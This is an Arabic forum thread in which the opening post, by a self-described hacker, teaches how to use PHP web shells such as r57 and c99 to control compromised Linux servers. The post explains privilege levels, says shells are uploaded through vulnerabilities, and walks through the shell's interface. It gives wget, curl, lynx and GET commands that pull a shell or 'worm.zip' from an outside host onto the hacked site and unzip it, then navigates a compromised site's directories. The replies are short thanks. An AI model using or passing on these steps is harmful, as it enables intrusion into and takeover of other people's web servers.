منتديات  

العودة   منتديات مدرسة المشاغبين > منتديات تطوير مواقع تطوير منتديات منتديات برمجه منتديات سكربتات PHP CGI ASP.NET SQL Scripts > تطوير المواقع و السكربتات Ajax XML CSS JavaScript PHP Perl CGI seo Search Engine web2

مشاركتك هنا تمثل للجميع أخلاقك وثقافتك تذكر هذا جيدا قبل نشرها في موضوع جديد


بنات سكستين منتديات المنطقة الشرقية ينتهي في 22-2-1433هـ
منتدى شموخ العز ينتهي في 6-3-2012 مرصد الطقس 13-4-1433هـ بنر منتديات شمعة الخليج ينتهي في 10-4-1433 هـ

روابط مهمة و مفيدة : لاستعادة الباسورد الرقم السري || كيف يتم تفعيل الاشتراك || افضل طريقة لطلب كود تفعيل على البريد
استضافة مواقع معنى كلمة رسائل مسجات دردشة شات افلام × فيلم
فلاش اسلامي الثقافة الجنسية في عالم الجنس صور جديدة   توبيكات × توبيك
ابتسامات خلفيات العاب جديدة دليل مواقع - مركز تحميل ملفات
بطاقات كروت جوال موبايل جافا java قصص روايات -
كتب الكترونية ماسنجر في مسنجر - - العاب بنات للبنات فقط 2010

موضوع مغلق
 
أدوات الموضوع طريقة عرض الموضوع
  #1 (permalink)  
قديم 11-04-2008, 10:35 AM
صور op4host
جاي معه ملفه
 
تاريخ التسجيل: Apr 2007
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
نوع الجوال :
مشاركات : 25
العمر :
Rep Power: 0
op4host النقاط 10
جديد الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره




بسم الله الرحمن الرحيم

في البداية اكثر الاعضاء يسالون
ماهو الشل؟
وما الفائده منه
وما هو استخداماته؟
وكيف يتم رفعه ؟
وماهي اوامره؟

اليوم جايبكم عشان نجاولب على كل الاسئله دى

ماهو الشل؟

وهو عبارة عن سكربت مكتوب بلغة php***** ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux حيث يستقبل الاوامر منك ويرسلها الى السيرفر المخترق وتعرض نتائج الاوامر على الشل.

ما هو استخدامه ؟

الان الكل يسمع عن الشل وما يعرف شنو استخداماته
وانا اقولك له استخدامات كثيرة فنحن الهكرز نستخدمه في السيطرة على السيرفرات !!

والان جينا للمفيد يستخدم للسيطرة على السيرفر واحيانا السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر ووتصفح ملفاته والتعديل عليها واحيانا يستخدم فى فك الزاند وهذا حسب صلاحياتك على السيرفر

واكيد راح تقولي ايه هيه صلاحياتي ؟؟

وانا اقولك الصلاحيات يعني انت ايه على السيرفر يعنى ايه موقعك عليه
الصلاحيات على السيرفر

1- Root اي انت مدير السيرفر يعني خلاص مافي شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا
2- User هنا صلاحياتك على الموقع الي انت رافعلة شل فقط اكرر على الموقع الي انت رافعلة شل فقط اي تعدل تعطي تصاريح الا اذا انتقلت لحالة الرووت
3- no****, http, apache هنا كلها نفس الشي ما تقدر تحذف ملفات او تعطي تصاريح للملفات
ولكن هذه الصلاحيات فيها ميزة حلوة وهي
انك تقدر تتصفح الحسابات الي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع الي انت رافعلة شل فقط

ولكن في سؤال مهم وهي اكيد انت راح
تقولي كيف اعرف صلاحياتي على السيرفر؟
وانا اقولك وانت في الشل تكتب id لمعرفة صلاحياتك وهو امر لينكس

ومن الكلام الي سبق اكيد انت استنجت شي وهي انك حتى تشغل الشل لازم ترفعة على موقع واكيد في سؤال بالطريق وهو

كيف ارفع الشل على موقع؟


وانا اقولك ولا يهمك يتم رفع الشل عن طريق الثغرات واكيد راح تسأل وتقول
ايه هي الثغرة؟ وانا اجاوبك مع انك مللتني من كثر اسالتك
الثغرة: وهي عبارة عن خطأ برمجي وضعف امني يساعدك في دخول نظام معين واختراقه وهذا الخطأ يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه واحيانا تساعدك الثغرة في الانتقال من حالة الى اخرى اي مثلا من نوبدي الى رووت حسب نوع الثغرة والثغرات تكون مكتوبة بلغة السي او البيرل او php الخ.....

والان الحمد لله عرفتوا شنو الثغرة ولنفترض انك تمكنت من رفع شل على موقع ولكن اكيد انت تبي تعرف

والان بعد ما الكل عرف ما هو الشل وانواعة واستخداماته راح اشرح لكم الشل الروسى
r57***** الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات
الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله واما الاصدار الجديد منه (موجود في المنتدى اصداره الجديد منزله الاخ متكي ورا الشمس)
فقد اضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك

الان اليكم الشرح حسب الترقيم في الصورة:
1- phpinfo هنا لمشاهدة البرامج المثبته على السيرفر وسوف اشرحها في درس اخر
2- السيف مود اوف والسيف مود هو حالة امنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال.
3- اصدار الينكس للسيرفر المخترق مع اخر تحديث له وهو 2005
4- id وهو كما ذكرت صلاحياتك على السيرفر وهي نوبدي
5- pwd مسارك على السيرفر اي مكان تواجدك

- هنا تكتب امر اللينكس مثلا id لمعرفة صلاحياتك
2- هنا المسار الذي انت عليه او اكتب pwd لمعرفة مسارك
3- هنا للتنفيذ اي عند كتابة امر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الامر واضغط انتر)
والان اشرح لكم دوال سحب الملفات والان اليكم الشرح وسوف اشرح على الدالة wget في البداية كشرح خفيف لمعرفة ان الدالة wget شغالة يجب
كتابة الامر which wget

وكما تلاحظون كتبنا الامر which wget في مربع تنفيذ الاوامر ونضغط انتر وشوفو النتيجة:

والان كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي ان الدالة شغالة والان نكتب امر السحب ولكن قبل كل ذلك يجب
ان تتأكد من ان المجلد الذي سوف تسحب الشل له يملك التصريح 777

كما تلاحظون الاختيارات:
1- هذا هو التصريح 777 الذي يجب ان يكون بدون شرطات كما في الصورة
2- هذا الاختيار هو المجلد الذي سوف نسحب له الملف الذي نريد
والان كل شي جاهز المجلد ذو التصريح والملف الذي سوف نسحبه وانا هنا سوف اسحب الشل ch99 للتوضيح لا اكثر ويمكن انت بهذه الطريقة ان تسحب
الاندكس الخاصة بالاختراق او اي شي اخر والان اكتب في مكان تنفيذ الاوامر

كود:
wget http://www.xxx.com/*****.zip
والشرح للايعاز wget دالتنا التي سوف نسحب بها الملف والموقع الذي بجنبها رفعنا له الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الايعاز لن يظهر لك اي رد
والان نحن رفعناه مضغوط فيجب فك ضغطه بالايعاز unzip *****.zip
كما تلاحظون الرد المحاط بالاحمر يدل على نجاح العملية والان
ماذا لو لم تعمل هذه الدالة؟

اقولك ولا يهمك في دوال غيرها مثلا دالة curl ايضا اذا اردت
التحقق من ان الدالة تعمل ما عليك الا كتابة which curl واليكم شرح بعض دوال السحب
ولنفترض ان الملف الذي نود سحبه هو worm.zip نبدا بالاداة lynx وطريقة سحب الملف كما يلي



كود:
lynx -source www.xxx.com/worm.zip > worm.zip
والاداة curl استخدامها كالتالي



كود:
curl -o worm.zip www.xxx.com/worm.zip
واخيرا الدالة get استخدامها كالتالي

كود:
GET www.xxx.com/worm.zip > worm.zip
وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط له واذا اردتم معلومات اكثر عن رفع الشل شوفوا موضوعي في قسم المواضيع المتميزة لرفع الشل
والان نكمل شرح الشل الروسي لنفترض انك عندك ملف وتبي ترفعة للسيرفر والملف على جهازك هتعمل اية؟؟؟

الاختيار 1- هنا لاختيار الملف من جهازك ومعناه استعراض brouse
2- هذا الاختيار معناه رفع اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والان شرح خفيف عن المسار الذي نحن فيه؟؟


/
كود:
mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html


كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي واكيد را تقولي شلون عرفت؟؟ وانا اقولك المجلد الرئيسي اما انه يكون public_html
او يكون على اسم الموقع كما في مسارنا او يكون www والي اخره حسب السيرفر والحين عرفتوا احنا ليش مو على المجلد الرئيسي ولكن اكيد راح تقولي ابي اصير
على المجلد الرئيسي وانا اقول تامر امر احذف المجلد html واكتب الايعاز التالي



كود:
cd
كود:
/mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/
مثل ما شفتوا حذفنا المجلد html وكتبنا الايعاز cd وهو يستخدم للدخول الى مجلد معين وتغيير المسارة

بسط جدا وارجو من الله ان تكون قد استفدتم من هذا الدرس

بارك الله فيكم ورعاكم

اخوكم
دكتور/ كمال محمد محمد




من مواضيعي في الموقع على الموقع 0 مطلوب مشرفين لمنتدى شغال وليس جديد مشرفين للاقسام
0 ****اشهار موقعك ومنتداك معى شركة برامجى لاشهار المواقع فرصة****
0 ما هوة ملف Htaccess اهو لحماية موقعك من الإختراق ام لا فلنتناقش
0 اوامر الشل لاصحاب المواقع والسيرفرات وهذا لاخى الذى يريد النجدة لمشكلة فى سيرفره
0 الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره
0 كتب اساسيات تصميم مواقع الأنترنت - متجدد باذن الله


  #2 (permalink)  
قديم 03-06-2009, 03:28 PM
جاي معه ملفه
 
تاريخ التسجيل: Dec 2008
البلد - المكان و السكن : المملكه العربيه السعوديه
السيرة :
هواية : اللعب
وظيفة - عمل: عاطل
جنس : ذكر
جنسية : سعودي
موقع : طريف
نوع الجوال :
مشاركات : 6
العمر :
Rep Power: 0
هدقيه النقاط 10
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره




مشششكور اخوي ششرح حللو ، وانت احلااا


من مواضيعي في الموقع على الموقع 0 الكنق هدقية يدعس ويخترق عشر مواقع .. من قبل هدقية هكر


  #3 (permalink)  
قديم 03-06-2009, 04:06 PM
صور مسك شمر
طالب ثانوي
 
تاريخ التسجيل: Nov 2008
البلد - المكان و السكن : _
السيرة : _
هواية : _
وظيفة - عمل: _
جنس : _
جنسية : _
موقع : ابــــــــــــــي مـــــنـــــتــــدى vbرســـــمـــي
نوع الجوال :
مشاركات : 542
العمر :
Rep Power: 4
مسك شمر النقاط 10
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره




مشكوووووووووووووووووور شرح في قمه الروعه


من مواضيعي في الموقع على الموقع 0 فائده السكن
0 شعر اخو العرجا /لكل من اسمه حمود
0 صور صح الرسم على الموز
0 شموع عجيبه
0 لحق : على المنتدى
0 مصمم فرنسي متخصص في الاعراس الخليجية .. شوفوا تصميماته الرائعة‎


_________________




اذا اعجبك موضوعي لا تقل شكرا ولكن ادعو لي كالاتي
~¤ô¦¦§¦¦ô¤~ (( ان يغفر الله ماتقدم وماتأخرمن ذنبي )) ~¤ô¦¦§¦¦ô¤~
~¤ô¦¦§¦¦ô¤~ (( وان يقيني عذاب القبر وعذاب النار )) ~¤ô¦¦§¦¦ô¤~
~¤ô¦¦§¦¦ô¤~ (( وان يدخلني الفردوس وان يجيب دعائي في الدنيا والاخره )) ~¤ô¦¦§¦¦ô¤~
ولكم ان شاء الله مثل ماتدعون لي به ماعليكم الا النسخ والصق
  #4 (permalink)  
قديم 01-11-2010, 07:57 PM
جاي معه ملفه
 
تاريخ التسجيل: Nov 2009
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
نوع الجوال :
مشاركات : 13
العمر :
Rep Power: 0
هكور2010 النقاط 10
رد: الشيل !! ما هو و انواعه وشرح كيف يتم رفعه وايضاُ وشرحه واوامره




بارك الله فيك وزادك علما


من مواضيعي في الموقع على الموقع


موضوع مغلق

مواقع النشر (المفضلة)

أدوات الموضوع
طريقة عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



للاعلان بالموقع

للاعلان بالموقع جوال 0555055075 ابو عمر بدر-جامعة نجران ينتهي في 3-8-1432 هـ-جامعة جازان ينتهي في 28-3-2012
الساعة الآن توقيت السعودية الرياض جدة الشرقية القصيم 10:22 AM.


Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd diamond
جميع ماينشر بالموقع لا يعبر عن اصحاب الموقع انما يعبر عن صاحبه

SEO by vBSEO 3.2.0